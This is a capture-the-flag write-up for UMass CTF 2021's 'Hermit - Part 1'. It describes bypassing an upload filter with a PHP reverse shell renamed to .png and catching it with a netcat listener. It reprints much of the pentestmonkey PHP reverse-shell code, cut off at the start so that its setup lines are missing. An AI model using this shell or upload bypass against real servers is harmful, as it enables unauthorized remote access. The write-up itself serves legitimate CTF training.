CTFtime.org

Hermit - Part 1

by gpsy / OnlyFeet

Rating:

Honestly? Go view the GitHub URL instead of looking here.

## Hermit - Part 1 (HP1)

### Description - HP1

Author: [goproslowyo](https://github.com/goproslowyo)

This box was a simple extension filter bypass to gain a shell and get the flag.

### Process - HP1

1. Started `netcat` listener on `8001`.
1. Uploaded php reverse shell with an image extension -- `.png` worked fine.
1. We're given a random filename `0YE8gg` and a link (`http://34.121.84.161:8086/show.php?filename=0YE8gg`) to view it.
1. Viewing the link executes the reverse shell to give us access.
1. From here we can explore the server and get the flag.

```shell
hermit@aec9a5b5ef1d:/$ ls /home/hermit
ls /home/hermit
userflag.txt
hermit@aec9a5b5ef1d:/$ cat /home/hermit/userflag.txt
cat /home/hermit/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
```

### Screen Grabs - HP1

#### User Shell - HP1

![user shell](./assets/HP1/shell.png)

#### User Flag - HP1

![userflag.txt](./assets/HP1/flag.png)

#### Root LUL - HP1

![{a_test_of_integrity}](./assets/HP1/rootlol.png)

#### Proof - HP1

![proof](./assets/HP1/proof.png)

### Tools Used - HP1

1. [Pentest Monkey PHP Revshell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

```php
array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
```

Original writeup (https://infosecstreams.github.io/umassctf2021/#hermit---part-1-hp1).

Comments